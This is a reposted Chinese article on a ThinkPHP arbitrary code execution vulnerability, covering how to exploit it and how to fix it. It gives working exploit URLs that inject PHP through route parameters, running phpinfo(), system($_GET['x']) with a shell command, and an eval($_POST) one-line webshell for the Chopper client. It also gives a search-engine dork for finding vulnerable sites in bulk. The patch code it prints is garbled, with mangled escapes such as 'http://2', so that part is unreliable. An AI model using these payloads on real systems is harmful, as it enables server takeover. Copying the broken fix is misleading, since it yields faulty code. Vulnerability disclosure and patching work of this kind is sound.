Thinkphp是國內著名的開源的php框架，是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的。最早誕生于2006年初，原名FCS，2007年元旦正式更名為Thinkphp，并且遵循Apache2開源協議發布。早期的思想架構來源于Struts，后來經過不斷改進和完善，同時也借鑒了國外很多優秀的框架和模式，使用面向對象的開發結 構和MVC模式，融合了Struts的Action和Dao思想和JSP的TagLib（標簽庫）、RoR的ORM映射和ActiveRecord模式， 封裝了CURD和一些常用操作，單一入口模式等，在模版引擎、緩存機制、認證機制和擴展性方面均有獨特的表現.
 
然而近期thinkphp框架爆出了一個任意代碼執行漏洞，其危害性相當的高,漏洞利用方法如下：
 

index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函數，比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以獲取服務器的系統配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出網站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接執行一句話代碼，用菜刀直接連接.

這樣黑客們就可以直接通過google批量搜索關鍵字：thinkphp intitle:系統發生錯誤 來獲取更多使用thinkphp框架的網站列表。可見其危害性相當的大。
 
thinkphp框架執行任意代碼漏洞修復方法：
 
用戶可下載官方發布的補丁：
 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源碼：

將/Thinkphp/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2";', implode($depr,$paths));

修改為：

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2';', implode($depr,$paths));

將preg_replace第二個參數中的雙引號改為單引號，防止其中的php變量語法被解析執行。
 
注：本文僅供學習參考使用，請不要用于非法用途。

php技術：ThinkPHP框架任意代碼執行漏洞的利用及其修復方法，轉載需保留來源！

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。